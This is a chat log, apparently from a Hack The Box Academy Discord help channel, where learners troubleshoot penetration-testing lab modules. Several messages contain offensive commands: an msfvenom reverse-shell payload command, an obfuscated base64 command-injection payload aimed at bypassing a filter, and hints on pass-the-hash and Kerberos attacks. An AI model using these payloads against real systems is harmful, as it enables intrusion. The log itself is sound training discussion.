#modules

1 messages · Page 210 of 1

tranquil axle
#

iirc krbrelayx can take hashes or pw as input, so you didnt have to convert it manually but just use the other parameter

cloud urchin
#

makes sense, thanks

tranquil axle
urban wadi
#

praying helps you learn faster

fathom pendant
#

3 days. A day is measured as 8 hours

urban wadi
#

so a 8h module is measured as 2.6 hours?

analog dock
#

Bruh

dim wolf
#

24 hours is not enough

analog dock
#

An 8h module is measured as 8h…

dim wolf
#

time must slow down to fit that ballpark

fathom pendant
feral lichen
#

hello, im having trouble since i packets dont reach the machine's IP and 10.10.14.1 responds that the hosts are unreachable, i have tried restarting several times the machines and doesnt seem to work

analog dock
urban wadi
#

24 / 3 = 8

analog dock
#

So?

urban wadi
#

so 8 /3 = 2.6

fathom pendant
#

The day metric is defined as a working day

urban wadi
#

same thing

analog dock
fathom pendant
urban wadi
analog dock
#

It’s not the same thing, one is measure in days, one is measured in hours

urban wadi
#

ye

analog dock
#

So not the same

urban wadi
#

exactly

analog dock
#

Jfc

fathom pendant
analog dock
#

Cant tell if you’re just trolling

fathom pendant
#

Didn't think I'd need to elucidate the obvious

urban wadi
dim wolf
#

shrink a day down to 8 hours
so you have 8 hours in a day
24 hours is 3 days

#

8 hours is not 2.3 hours

analog dock
#

If you see a module listed as 8 hours, it’s 8 hours, if you see a module listed as 3 days, it’s 3x 8 hours

fathom pendant
urban wadi
#

meaning only 1 whole day

#

3days in htb = 1 day irl

analog dock
#

If you want to sit behind your screen for 24h, sure

fathom pendant
#

When you say you worked a day, you don't say you worked 24 hours

#

You worked 8 hours of that day

urban wadi
analog dock
dim wolf
#

i couldnt imagine working that long..

analog dock
urban wadi
#

lmao

alpine umbra
analog dock
alpine umbra
#

then what

fathom pendant
#

That's a certificate like something used for ssl stuff

analog dock
#

Then go back and enumerate with tom’s credentials

dim wolf
#

magnus carlsen can bend time

alpine umbra
fathom pendant
#

Admitting to having an alt: mods ban this man

analog dock
remote latch
analog dock
#

Who’s use is the other acc then?

remote latch
fathom pendant
analog dock
#

So personal use as well

#

Don’t use alts

fathom pendant
#

You don't need an alt for desktop and mobile g

remote latch
#

cant send shit myself

analog dock
fathom pendant
#

You know you can create your own private server yeah?

dim wolf
remote latch
#

i just need chat with myself

#

talking to myself

analog dock
fathom pendant
alpine umbra
analog dock
#

Still no need for an alt

fathom pendant
dim wolf
#

i have my own private server where i send stuff to transfer

remote latch
fathom pendant
#

Nah, having an alt is just cringe

onyx dust
#

;x

fathom pendant
#

Especially if it's for the purposes of being lazy

feral lichen
#

I'm actually stupid, ignore the message i send above wanting help, i got 2 aliases htb and htb_academy to connect to the vpns i was using the wrong one

onyx dust
#

alts r the best

feral lichen
#

i've lost 1 hour of my life

dim wolf
#

there's definitely no need for an alt unless you need a separate one for work/school/whatever that isn't personal

alpine umbra
fathom pendant
#

If you were doing it for the sake of being a troll or fucking around that's different

onyx dust
#

u should always have alts

#

dont listen to these people.

#

they dont hack anyone

fathom pendant
dim wolf
#

it's ok i have an alt myself

onyx dust
#

you should have one as a matter of personal cleanliness

remote latch
alpine umbra
analog dock
fathom pendant
analog dock
#

Yes

remote latch
#

i use it when my battery died

#

you can think of it as teleportation

fathom pendant
#

My brother in christ

alpine umbra
fathom pendant
#

You can sign in on your desktop

limpid hemlock
#

Anybody kno hot fix the problem where xfreerdp isn't connecting in the pass the hash from windows section??

dim wolf
#

why not just use the same account on both pc and mobile

#

it's honestly easier that way

fathom pendant
remote latch
dim wolf
#

seems counterproductive

limpid hemlock
#

What single quotes

remote latch
fathom pendant
limpid hemlock
#

Yes

fathom pendant
#

Iirc it's /h: or /pth:

limpid hemlock
#

No here password is provided

fathom pendant
#

Are you sure?

#

I vaguely recall it gives you a hash, not a password

limpid hemlock
#

Ya this is the pass the ticket from windows

fathom pendant
#

Yes: but you can't use the hash as the password with xfreerdp

#

It's a different argument for it than /p:

limpid hemlock
#

This is the chapter right after pass the hash one in that only hash given

alpine umbra
limpid hemlock
#

Here we get the password to login via rdp but can't login

fathom pendant
#

That's why I phrased my hint the way I did

fathom pendant
alpine umbra
fathom pendant
fathom pendant
#

The all argument for fetch doesn't grab email contents

fathom pendant
alpine umbra
dim wolf
fathom pendant
alpine umbra
fathom pendant
#

Very useful feature of discord

dim wolf
#

Marcie's already told you exactly what you need to do

#

but i recommend looking some commands

fathom pendant
#

There's a reason I remember a lot of nuanced things

#

Because people ask the same damn things

alpine umbra
#

is this platform watch from htb

fathom pendant
#

?

misty saddle
fathom pendant
#

Most people don't know how to Google and have not seen the forums

misty saddle
#

Like straight up giving the answers :p

#

Yeah, they should include the links to the forums in the modules.

fathom pendant
#

Eh

misty saddle
#

Would maybe make it less flodded in here with easy to answer questions

fathom pendant
#

This channel's purpose is literally assistance with modules, no matter how simple/easy they are

cloud urchin
#

i mean the modules literally say come to discord for help lol

dim wolf
#

i also think discord has become the norm for this kind of stuff

#

i haven't made a forum account in years

fathom pendant
#

It's also faster to get an answer here than the forums

misty saddle
fathom pendant
#

Though I swear @acoustic owl stalks the forums

fathom pendant
#

Or going far outside the scope of what's expected to answer

acoustic owl
fathom pendant
#

I just remember early on whenever I was searching the forums I'd see your name kek

misty saddle
fathom pendant
#

Yeah. Its mostly why I stopped using it

#

But also in the forum, it's better to be a bit more direct as it's much more asynchronous communication

tranquil gull
#

Is anyone able to assist with the AD challange 2?

fathom pendant
#

you mean AD enum and attacks Skill Assessment 2?

tranquil gull
#

Yes

#

Im on the sql01 box as mssqlexpress

#

with the creds I found previously

#

but dont see a way forward

tranquil gull
fathom pendant
#

Haven't finished this module

analog dock
#

What question are you stuck on

fathom pendant
#

You can likely find nudges using discord's search feature

alpine umbra
fathom pendant
tranquil gull
alpine umbra
tranquil gull
analog dock
#

Have you checked your privs?

tranquil gull
#

Im a sysadmin

analog dock
#

That’s not what I asked 😄

#

Whoami /priv

tranquil gull
#

of course lol forgetting the basics

analog dock
alpine umbra
#

how to find mysql database details guys

fathom pendant
#

if it's not working. reset the target and try again

alpine umbra
fathom pendant
#

a good majority of the times you will be provided credentials to use

alpine umbra
fathom pendant
#

dude i'm busy "some issue with pass and show error" isn't really descriptive

#

what error

alpine umbra
#

i found password from users database but htb says it is not password

fathom pendant
#

make sure there's no additional spaces before/after

alpine umbra
#

yes already check

#

done

alpine umbra
stark vortex
tranquil gull
analog dock
#

Well I used inveigh

tranquil gull
lapis stirrup
#

Hello, I don't understand why I can't get the right answer.

Linux Fundamentals/File Descriptors and Redirections

First question : How many files exist on the system that have the ".log" file extension?

locate *.log | wc -l
return 29
Right answer : 32 ! (I got it from BF ...)

How many total packages are installed on the target system?
dpkg --list | wc - l
return 748
748 is a wrong answer ...

Can someone please explain my mistakes? Thx

cursive zinc
#

Hi everyone, I am working on the Windows module, the first chapter, I managed to find the executable requested by the first question but I cannot understand

#

The required response format

#

I found poqexec.exe as executable

fathom pendant
#

there's several windows modules

astral inlet
#

true

fathom pendant
#

Intro to Windows CLI; Windows Priv-Esc

cursive zinc
#

Windows vent fining evil

fathom pendant
#

off the top of my head

#

ah right the blue team one

cursive zinc
#

Yes

astral inlet
#

n0 81u3 f0r m3 😉

cursive zinc
#

It asks me for the answer in the format: T_W_____.exe I don't understand what that means

paper basalt
#
ubuntu@WEB01:~$ chmod +x backupjob
ubuntu@WEB01:~$ ./backupjob
Segmentation fault (core dumped)

Pivoting, Tunneling and Portforwarding section, module "Meterpreter Tunneling & Port Forwarding"

Followed the module completely. Tried Pwnbox and own machine. I see others have had issues with this, but cant see any solutions

fathom pendant
fathom pendant
paper basalt
#

Ran the command exactly as its written in the module msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IPaddressofAttackHost -f elf -o backupjob LPORT=8080

fathom pendant
#

I take it you substituted the ip for yours yeah?

oblique tusk
fathom pendant
fathom pendant
#

With dpkg --list you'll need to additionally grep for 'ii' (which is dpkg speak for "fully installed"

paper basalt
fathom pendant
lapis stirrup
cursive zinc
oblique tusk
fathom pendant
fathom pendant
oblique tusk
#

Like imagine apt list --installed returns
Okay boss here are some packages that you have installed. Here they are... package1 package2 [...]

fathom pendant
#

Also it helps to run this on the target machine

#

That's how you get the expected answer

oblique tusk
#

Also apt gives you a warning that its output is not clean WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

fathom pendant
cursive zinc
#

Please is there anyone who has worked on the windows vent fining evil module?

tranquil gull
analog dock
lapis stirrup
fathom pendant
fathom pendant
#

most tools as well will give you descriptive errors or at least some sort of thing to tell you why it failed

#

i.e. 'command not found' < self explanatory - you don't have the tool installed/the tool isn't in your PATH

paper basalt
#

okay worked with a stageless payload for some reason

mellow delta
#

MarcieLee, did you work your way through the whole pentesting learning path? How long do you think it took you if you did?

cloud urchin
#

in the kerberos module rbcd from linux, using rbcd.py i get an error saying "msDS-AllowedToActOnBehalfOfOtherIdentity is empty", this means carole can't abuse this, right? are there other creds i'm supposed to use?

#

stuck on this because the command doesn't work

cloud urchin
#

i was able to complete it by using an older version of rbcd.py

minor stag
#

Obviously with all caps on the FUZZ since it decided not to let me post it with all caps.

minor dome
#

maybe u want only two websites on same host

#

so u specify

mellow delta
#

sorry, i mean not sure how to find the admin email address.

next bronze
minor stag
#

Also trying to determine if I should be using ffuf or wfuzz.

next bronze
#

yeah so vhost fuzzing vs subdomain fuzzing

fathom pendant
next bronze
#

ffuf is faster and still being udpated

minor stag
#

Maybe I don't fully understand vhost vs subdomain

mellow delta
fathom pendant
#

Perhaps not in the inbox you start with

#

But there's other mailboxes

mellow delta
#

oh.... ok. Let me mess around. Thanks

fathom pendant
#

Enumeration is key

mellow delta
#

you are very very good at this

solar grove
#

I am on the last question wordpress skill assesment but when I place the web shelli I get the following error --> Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP.

indigo locust
#

can someone ping me directly to provide clarification for this question please?

fathom pendant
#

What question

fast badger
#

can any of my senior help me out because am losing my question i feel it write but the input into the task is wrok

fast badger
# onyx dust wut

i mean't this "Can any of my seniors please assist me? I'm going crazy over this question; I think it's correct, but the exam is showing it incorrectly because of the input text "

#

question " What is the name of the network interface that MTU is set to 1500?"

onyx dust
#

send a link to the module

fast badger
#

whatt link ?

onyx dust
#

are you taking an exam or doing modules?

#

every module has a url.

fast badger
#

modules

onyx dust
#

yeah that thanks

#

what happens when u run the ip a command

floral crow
#

Need some extra eyes if someone is able, am I missing someting here? This is for the Command Injection Skills assessment. I have found the parameter to exploit, but no matter what I obfuscate, or encode I get the Malicious request detected ||/index.php?to=tmp%2F696212415.txt&from=696212415.txt%26%26b$@ash<<<$(b$@a$@s$@e64 -d<<<bHMgLWFsaA==)
&finish=1&move=1 ||.

fathom pendant
#

tfw the kerberos ticket didn't wanna load for me to read the share >:(

fast badger
onyx dust
#

ifconfig is deprecated by ip because of systemd

fathom pendant
#

of course bling-bang-bang-born comes on as I get it working

fast badger
fathom pendant
#

the song is a banger

onyx dust
#

wat song

fast badger
#

i can't access my Pwnbox and i have subscription for Platiinum, which included unlimited Pwnbox usage.

onyx dust
alpine umbra
#

hey guys want some tips for make notes for modules and ready for the exam. any cpts completed one?

alpine umbra
onyx dust
floral crow
floral crow
onyx dust
#

oh. i see. no documentation above it.

floral crow
# onyx dust oh. i see. no documentation above it.

Need some extra eyes if someone is able, am I missing someting here? This is for the Command Injection Skills assessment. I have found the parameter to exploit, but no matter what I obfuscate, or encode I get the Malicious request detected ||/index.php?to=tmp%2F696212415.txt&from=696212415.txt%26%26b$@ash<<<$(b$@a$@s$@e64 -d<<<bHMgLWFsaA==)
&finish=1&move=1 ||.

next bronze
#

I don't remember what I did exactly but think dumber, also test for which characters are blacklisted so you know what to avoid

floral crow
next bronze
#

if you see malicious request detected then you're probably using a bad character

floral crow
#

ya, that's indeed what' im seeing

cloud urchin
#

is anyone else having issues spawning their vm? my box won't spawn for kerberos module "Account Enumeration & Password Spraying with Kerberos"

oak sage
#

any reason that my target isnt spwaning on this network enumeration with nmap hard lab

short hare
#

And done..!! fingerguns
Thank you @fathom pendant @next bronze @placid edge @limber river

cloud urchin
#

looks like i'm not the only one then.. server must be down

oak sage
#

lmao crazy timing

short hare
#

Completed..!
Thank you everyone for the support to solve some crazy questions

That's a lot 💛

dim wolf
#

congrats

alpine umbra
#

htb loging issues any one face it?

fathom pendant
#

been fine on my end

alpine umbra
#

how i log this so teribble. how i report this?

fathom pendant
#

using the support bubble

#

in the meantime try changing vpn regions ¯_(ツ)_/¯

#

if you're logged in*

#

if you're having trouble logging in; try clearing your browser cache

#

and disabling adblock

alpine umbra
#

for support him

alpine umbra
#

no previous one

floral crow
alpine umbra
floral crow
#

I resolved the issue and completed the module. ** Note to self, don't always assume your injecting in the correct parameter even if you get the Error, try other parameters and get things qiuckly lol!

buoyant void
#

Alright I'm really stuck on the File Inclusion skills assessment, I don't want to say too much to not spoil most of the assessment. But I'm trying to ||poison the log|| and I am having zero success and I can't figure out why this isn't working.

Edit: Nevermind restarting the target solved the issue

crimson moon
#

What do you guys use for transferring files from host to Pwnbox with RDP session inside it? I don’t think http server work so

zinc nimbus
#

its the same module as r3dph30n1x#7788 can someone help me none of the smb or ftp methods are working to transfer the file

zinc nimbus
#

file transfer module in the windows file transfer methods

crimson moon
zinc nimbus
#

everytime i try to transfer the files from my host to the target by using the target's powershell it says nothing is found

crimson moon
#

I’m in a different module not the file transfer module

zinc nimbus
#

so what do i do use base 64?

#

oh

soft cedar
#

yes you can

zinc nimbus
#

so the rest of the methods dont work?

soft cedar
#

they all work iirc

#

pretty sure I tried it all ^

zinc nimbus
#

i tried to ping my host from the target's powershell and there is no connection why

soft cedar
#

what error are you facing with smb / http?

zinc nimbus
soft cedar
zinc nimbus
#

no ill try but the ftp transfer isnt working either

shut quest
soft cedar
soft cedar
soft cedar
# zinc nimbus

you have to Ensure that the upload_win.zip file is actually present in the share directory on your pwnbox machine

zinc nimbus
#

what if the command is this sudo impacket-smbserver share -smb2support /tmp/smbshare
is the file in the smbshare directory?

shut quest
#

would you look at that it does

soft cedar
zinc nimbus
#

ok i dont have the dir b4

soft cedar
#

and copy the zip file there.

zinc nimbus
#

i did this but it still isnt working

do i have to replace n

#

its here

soft cedar
zinc nimbus
soft cedar
#

can you ping the windows box?

zinc nimbus
#

nvm we need to connect rfirst

#

yup but my windows box cant ping my linux VM

soft cedar
#

Nvm.
bruh your share name is wrong

soft cedar
zinc nimbus
#

in my windows session or linux

next bronze
soft cedar
#

you should be able to view the contents now

dir \\10.0.2.15\smbshare\
soft cedar
soft cedar
next bronze
#

the sharename is specified as share

#

1st argument

zinc nimbus
#

its not working

zinc nimbus
#

yea i think the name of the share is "share"

soft cedar
soft cedar
next bronze
#

the first argument without - dictates the share name

zinc nimbus
#

😭 my windows session crashed on me

#

im good now

soft cedar
next bronze
#

share is the shareName, and /tmp/smbshare is the sharePath

#

positonal arguments in argparse

soft cedar
next bronze
zinc nimbus
#

no its stil not working

next bronze
#

first make sure the windows target can ping your ip

zinc nimbus
#

why can my linux VM ping my windows but not the other way

#

it doesnt work

next bronze
#

run ipconfig in windows, send the output

zinc nimbus
next bronze
#

looks like firewall

zinc nimbus
#

yea i tried with my actual OS and it was the same thing

zinc nimbus
#

yea im trying i think i disconnceted the xfreerdp session by accdient

#

nvm lab expired

zinc nimbus
soft cedar
soft cedar
zinc nimbus
#

ok

#

i forgot

#

it works now

next bronze
#

yeah that should do it

analog dock
#

And using the share too?

soft cedar
analog dock
#

If you didn’t reset your vm, you were using the wrong ip all along

#

10.0.2.15 instead of 10.10.14.86

zinc nimbus
#

i forgot to use tun let me see if it works now

next bronze
zinc nimbus
#

OMG IT WORKS YES THnks

analog dock
#

👍🏼

zinc nimbus
#

ty so much guys/girls helps a lot

next bronze
#

👍

analog dock
#

Always make sure you use the right ip

soft cedar
buoyant void
crimson moon
#

This can be done even if host and the rdp sessioned host doesn’t have any communication?

next bronze
#

if there's no communication then you won't get rdp either

soft cedar
crimson moon
#

So, the file is in my main host and I’m running pwnbox thru which I’m RDPing to another host. I want to get the files from main host >> RDP’ed host

crimson moon
autumn pilot
#

use the techniques from the file transfers module

#

it wouldn't be that hard, aditionally, look into the manual of xfreerdp or whatever tool you use for the RDP

crimson moon
soft cedar
#

then there should be a connection if its not pivoting and intro module@crimson moon

next bronze
#

main host like your own pc? pwnbox has internet access so whatever you have in your own pc, pwnbox can be used to download it

crimson moon
analog dock
#

Just get whatever you want on pwnbox

#

If you’re working from your own pc you might as well leave pwnbox out and just use your own vm and use the vpn🤷🏼‍♂️

crimson moon
placid edge
#

lol, congrats on completing the path!

burnt owl
#

Hey guys is it just me or have the SSH and RDP machine become incredibly slow and unstable?

short hare
#

Hey do HTB offers path completion certificate kind of thing ????
If so how can I have it?

burnt owl
#

RDP half of the time only launches on a black screen for me. When it works after multiple tries its unbelievably slow.
SSH is more stable but slow as well.

analog dock
analog dock
short hare
analog dock
burnt owl
#

that fixed it

short hare
analog dock
#

Black screen got another one

next bronze
#

pass cpts and you get a cert

analog dock
#

Many have perished before you

soft cedar
burnt owl
#

That makes me feel a little better....

analog dock
#

😄

burnt owl
#

Any secret tips for the slowness of ssh and rdp?

soft cedar
#

and a cool little sword ^

analog dock
#

I haven’t really had issues with it personally

next bronze
#

pick a server closest to you

analog dock
#

The issue might be your own connection

burnt owl
#

46 ms

soft cedar
burnt owl
#

nvm that was pwn box, not sure can I test it from my own VM?

next bronze
#

ping the target ip

burnt owl
#

14 ms

#

It could also just be me being spoiled and always having instant feedback.

#

Already happy that the backscreen will not be a problem anymore

next bronze
#

I mean there will always be some latency with rdp, but I haven't really run into it being unuseable

burnt owl
#

My biggest annoyance is when I hit backspace and it takes 3-5 secs for it to actually do that.

next bronze
#

try swtiching vpn servers i guess, but if it shows <100ms I don't see how it's doing that

burnt owl
#

Thanks will try, Thank you everybody for tha help ❤️

short hare
tight cave
#

Hello everyone,

I would like to ask for you help in module "Web Requests" in CRUD API section..

I tried to follow the instructions to obtain the flag but when I try to update the name of any city to update with the name "flag" the update command doesn't seem to work although the code seems to be accepted by the terminal ..

Do you have any suggestions about this?

The command that I'm using is the following (for example) :

curl -X PATCH http://83.136.252.214:51966/api.php/city/london -d '{"city_name" :"flag"}' -H 'Content-Type: application/json'

After the above update when I try to display the result it seems that the update didnt happen at all..

Thanks in advance! Have a great week!

white crater
#

Module : ADVANCED XSS AND CSRF EXPLOITATION
Section : Bypassing CSRF Tokens via CORS Misconfigurations
I am working on the question at the end of the section. I used the payload shown in the section with a minor change of the element id from csrf to csrf_token.
But i dont see any token for admin in the /log
Also tried few times of restart the lab
Need some assistance please

placid edge
#

or maybe im mixing them

tight cave
placid edge
#

seems weird that url you have

#

api.php/city/london

#

sure its not api.php?city=london

#

or whatnot

tight cave
unkempt ether
#

footprinting - hard
hi can anybody help me im stuck at the initial stage of the lab
i cant find the snmp running on the target

astral inlet
#

link ?

unkempt ether
astral inlet
#

did you look for every port ?

unkempt ether
#

nope it took too long for me like it was none stop or using your own vm faster?

astral inlet
#

is it linux or windows ?

unkempt ether
astral inlet
#

the "victim"

unkempt ether
astral inlet
#

you should, enum everything

unkempt ether
astral inlet
#

understand what you do

#

how to enum right

#

if you do not know what you are dealing with , you can´t hack it

unkempt ether
astral inlet
#

tcp or udp ?

unkempt ether
astral inlet
#

yes

unkempt ether
#

udp

astral inlet
#

and you are sure snmp is the answer ?

#

no other service ?

minor stag
#

I can't even complete modules this morning because the SSH and RDP connections keep crashing

unkempt ether
astral inlet
#

hmmmmmmm imap or pop3

#

maybe this would help

unkempt ether
astral inlet
#

or maybe restart server ... sometimes it hangs

#

i did this module some tiome ago tbh

unkempt ether
astral inlet
#

the "victim"

#

not the vpn

unkempt ether
minor stag
#

Oh that one. I remember this one. Where are you stuck?

#

I will say that snmp is definitely the answer on that one

digital junco
#

Hey guys.
I have a question about an SSRF question in the Web Service & API Attacks module:
The question is the following:

The payload consists of a base64 encoded url, when trying to access 127.0.0.1:3002 the connection is open and nothing happens.

As he asks to identify, I believe I am missing something.
I thought about serving an index file on my machine and making the request for it but I don't really know how to set up the index since I don't have access to the technology running on the server...

#

anyone to help?

shadow current
#

On the Module Password Attacks there is a section called password mutation and im stuck on the assesment here is the question "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer." Basically the things i have done are:

Create a mutated list with this command "hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list"
Brute force ssh using this command " hydra -l sam -P mut_password.list ssh://10.129.151.233"
I also Tried Brute forcing FTP. Still no luck can anyone give a guide here?

soft cedar
soft cedar
short hare
icy hazel
#

Hi guys, I'm currently on "Windows Attack and Defense | Kerberoasting" but I can't ssh or rdp to the kali vm. I've tried following the instructions on the previous page but it gives me a certificate verification failure (self signed certificate). Any advice?

dim wolf
#

does it ask you to connect anyway

icy hazel
#

No

dim wolf
#

oh that's right

#

you don't connect to the kali vm on that section

#

you connect to ws001

icy hazel
#

No?

dim wolf
#

see at the bottom of the page it asks you to rdp using bob's credentials

icy hazel
#

It says to use hashcat, is that on the ws001

#

Yes

dim wolf
#

you probably can ssh into kali from ws001 but i didn't do that

#

i just cracked the hash on my own vm

icy hazel
#

Sounds like a plan

#

Thank you !

upbeat dragon
#

Guys quick question, i just elevated my privs to local admin group. running "net localgroup administrator" i see my account there. but somehow when i try to access admin folder doesnt work... logged out and back in of RDP still nothing, ran gpupdate /force also and same thing.. What step am i missing?

upbeat dragon
#

Last one

#

Lateral Movement Attacking Enterprise Networks

#

Everytime i try to access teh admin folder to get the flag over the desktop i get an access denied

shut quest
#

what host are you on?

upbeat dragon
#

MS01

#

I think the problem i have is that everytime i try to open an elevated pshell it tries to log in as a domain joined user, which i'm not..

#

Haha got it

rustic sage
#

hey

tight cave
# placid edge sure its not api.php?city=london

i tried your suggestion but nothing seems to change, it accepts the syntax but still it doesn't apply the update for some reason... But when i try to insert a new data (instead of update) using POST , the command works just fine... Thank you for your suggestion though. :))

rustic sage
#

use PUT instead of PATCH

#

should you be passing in a country_name also?

tight cave
arctic talon
#

Is it correct that I can use my APP vip OpenVPN for Academy also? It's seems to work fine?

onyx dust
#

what do u do when u run out of modules?

dim wolf
#

wait

onyx dust
#

for what

dim wolf
#

new modules

onyx dust
#

soon (tm)

#

been thru enough of that ^

#

i mean as a computer hobby

dim wolf
#

i was about to ask when's the first insane module but that's not a difficulty..

onyx dust
#

what do u do when there are no more modules

dim wolf
#

i would probably do some boxes

onyx dust
#

i think the challenges part of the website is so slept on tbh

#

can get really creative if u want to

dim wolf
#

a lot of the challenge categories i have no experience in

onyx dust
#

in terms of exercises it's good to practice approaching and modeling problems in a manna thatz complimentary to unique problem sets

#

if they are easy u can get the experience with some experimentation and a few F5

dim wolf
#

you have a point

onyx dust
#

i am about to run out of modules

dim wolf
#

i just have a hard time figuring out where to start

onyx dust
#

might study basketweaving next. seen some cool stuff people can make.

dim wolf
#

if i ever run out of content.. might just go back to doom modding

rustic sage
#

you guys should get into bin exp, that's what all the cool kids do these days

onyx dust
#

yeah really?

#

i'm on pwn college why are u absent

rustic sage
#

pwn college is p good

dim wolf
#

i just completed the assembly module so it's a plausible path to take

rustic sage
dim wolf
#

but i'm taking the soc path so i gotta do malware analysis

onyx dust
#

i'm null from crackmes

#

this is my other handle

rustic sage
#

is the heap content on pwn.college good?

onyx dust
#

idk i just like the way it is structured and welcoming.

#

y u in this discord but not that 1?

rustic sage
onyx dust
#

tell me more about VR

tight cave
onyx dust
#

what trainings are good for VR and pwn ?

rustic sage
onyx dust
#

do u kno thegrugq

rustic sage
#

At work it's mostly web exploitation but I have recently been assigned to do some kernel research

#

is he the twitter guy? maybe?

onyx dust
#

i drive him to drink and relapse

#

i think he was/is big in that space tho

rustic sage
#

ive seen his tweets

#

he doesnt seem active anymore

onyx dust
#

anyway this is tha modules channel

#

are there any pwn modules u know about?

#

i did the binex ones and am finishing game reversing

#

but outside of that i'm not sure?

rustic sage
#

how good are you at each section

onyx dust
#

it seems like all the kool kids are doing kernel on iot

#

quick fireos bounties

rustic sage
#

yes kernel stuff is cool but you need rop knowledge first

onyx dust
#

oh? is that like alphabet soup but for memory?

rustic sage
#

idk what you mean

dim wolf
#

Return-Oriented Programming

onyx dust
#

alphabet soup is a random assortment of small pasta formed in the shape of alphabet characters and consumers make a game of rearranging it into comprehensible words

rustic sage
#

oh thats like stack-based

#

so the usual beginner pwn stuff is rop

onyx dust
#

oh i see

#

do you think chaining rop gadgets together is like playing alphabet soup

rustic sage
#

i would suggest focusing on rop until you understand it well. look at all stack protections and understand how canary, nx, pie, relro all work. practice buffer overflow with ret2shellcode, ret2win and then do ret2libc. Learn about leaking addresses via f-strings and how to overwrite memory such as GOT.

#

After this focus on statically compiled binaries where there is no libc, use the syscall gadget to pop a shell. then look at srop techniques for when there are lack of gadgets to populate a execve syscall

upbeat dragon
#

Hey guys im losing my mind in the last module of enterprise. need to sync my kali with DC01 via proxychains, tried plenty of tools but everytime i get server not eligible with ntpdate...

rustic sage
onyx dust
#

why are u here

rustic sage
#

am i not allowed to be here ? i was being helpful ...

onyx dust
#

no i was wondering if u dont do that why would u visit

rustic sage
#

for cyber apocalypse

#

its pretty fun

echo forge
#

I got the port but it seems not to work, when I use it. can you please give a hint? I'm not sure if i got the right IP

onyx dust
onyx dust
dim wolf
#

i'll keep that in mind

junior oxide
#

im stuck on password attacks module under pass the hash from linux section in the last question before the optional exercises where should i be looking for linux01 kerberos ticket exactly i have used all the ones in the tmp file and got nothing

junior oxide
signal laurel
#

Im working on the Advanced XSS and CSRF CORS misconfiguration module. Can someone DM me? Im not sure I understand what the challenge is expecting

sly grotto
#

any help for MODERN WEB EXPLOITATION TECHNIQUES Skills Assessment?
admin password and ssrf

acoustic owl
signal laurel
#

wait nvm.

signal laurel
obsidian fox
cloud urchin
prisma cave
#

Hello, can somebody tell me what the glibc version is in the module Linux Privilege Escalation Shared Object Hijacking ? I have know tried so many versions because the one on the machine is/are not working. Edit: Solved it (Had a Space somewhere)! This module is just trash.

sly grotto
obsidian fox
#

Tried to reset the machine and perform it again, the flag is still the same however HTB does not accept it

autumn pilot
#

carefully read the question, emphasize on the path of the file

heavy edge
#

so im doing the footprinting module, on ODAT.

#

i installed ODAT but gettgin this

#

i even chmod +x the py files

austere osprey
#

Hi guys 🙂 As I'm doing the cwee path I'm keeping on adding scripts for tedious attacks here: https://github.com/nirzaaa/cweeScripts
Would be happy to share with you if might help, you can dm me for feedback if would like too of course

austere osprey
# rapid sparrow Really cool and appreciated it

Thank you very much for the kind words, very important to me to give back to the community. Tried to add comments and explanations too to make it easier for people who following too the cwee path with scripts that will help them along the way❤️

obsidian fox
thorn urchin
#

Since Ive loooooong since completed that module

#

just @ me if you do I dont get new message notifications

final mica
#

is anyone on ACTIVE DIRECTORY ENUMERATION & ATTACKS not able to rdp? given just a black screen?

obsidian fox
#

Sure, thank you so much in advance!

small scroll
#

Can anyone help me out with the Secure Coding 101: Skills Assessment for the Patch section? Im just at a loss at what I am supposed to sanitize. I have tried to sanitize a bunch of different stuff but nothing's worked yet

shut wraith
#

Hacking Wordpress

Directory Indexing

I have tried many things to reach the directory that includes the flag including trying the plugins that are available. If anyone can help I would appreciate it

acoustic owl
onyx dust
#

i used c# and took advantage of harmony in bepinex to write a prefix patch that sets drm to 0 but i'm curious how you did this with dnspy

graceful mortar
tranquil grail
#

hey guys, I'm such a noob and am stuck in Using Web Proxies module, can someone help me? I'm trying to find the damn flag using burp intruder, the question goes like "Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.", I've set the payload option to .html, the grep - match to 200 OK and the position is "GET /§admin§/ HTTP/1.1..." but whenever I start attack, it gives me a 403 status for the .html file. What am I doing wrong?

obsidian fox
#

Thank you both @autumn pilot and @thorn urchin. Managed to solve the lab I made a very stupid mistake

thorn urchin
#

spoiler: make sure yall attacking YOUR lab 😛

tranquil grail
#

Nothing seems to work

thorn urchin
languid galleon
#

Good afternoon. I'm stuck and need some help on SQLMap Esstentials - Attack Tuning : What's the contents of table flag5? (Case #5)

I've dumped a flag from the flag5 table but it's not accepted. I've checked it for whitespaces and I've tried everything from this lesson to see if another flag is found but all I can find is the same incorrect flag.

Here's what I ran: ||sqlmap -u http://$target/case5.php?id=1 --no-cast --dump --level=5 -T flag5 -C id,content --risk=3 --batch||

Here's the last piece of the flag I keep getting: ||w0r7h_17||

I tried to be more explicit in my command is the reason I added the -C switch with id and content. It really didn't do anything. I've tried other syntax variations with the -a switch but it didn't change my result either. I'm lost in the sauce lol

buoyant void
#

I was having lots of issues with that question, eventually just restarting the target and running my exact same command again worked and I got the flag

mint lodge
misty saddle
#

I'm having this issue with Antak Webshell in the Shells & Payloads module.
I followed the "guide" in the module and I'm supposed to get a Powershell window and I get met by the error page. I've tried to reset the ip etc. but with no luck. Can anyone nudge me in the right direction? Thanks!

floral cedar
#

If someone encouter this error. There is an easy fix for it. In Remmina configure the TLS Security Level on 0 -- Windows 7 compatible

languid galleon
heavy edge
#

can i get a nudge for the foothold medium lab. im enumerating and feel like im in the right dir but not sure

cloud chasm
#

Module:NTLM Relay Attacks
Question Skills Assessment:Compromise BACKUP01 and then submit the flag located at 'C:\Users\Administrator\Desktop\flag.txt'
Hi can anyone give a hint im stuck here

heavy edge
fathom pendant
#

you don't need to check every file

minor stag
fathom pendant
#

most of them are infact empty

heavy edge
fathom pendant
#

well if only there was a way to find a file that's not empty

#

:)

minor stag
#

If only you could see the forest for the trees

onyx dust
#

hehehehe

heavy edge
#

why do i make things harder than they are

#

i wayyyy otherthought what i need to do in medium

#

am i supposed to get this error

minor stag
heavy edge
#

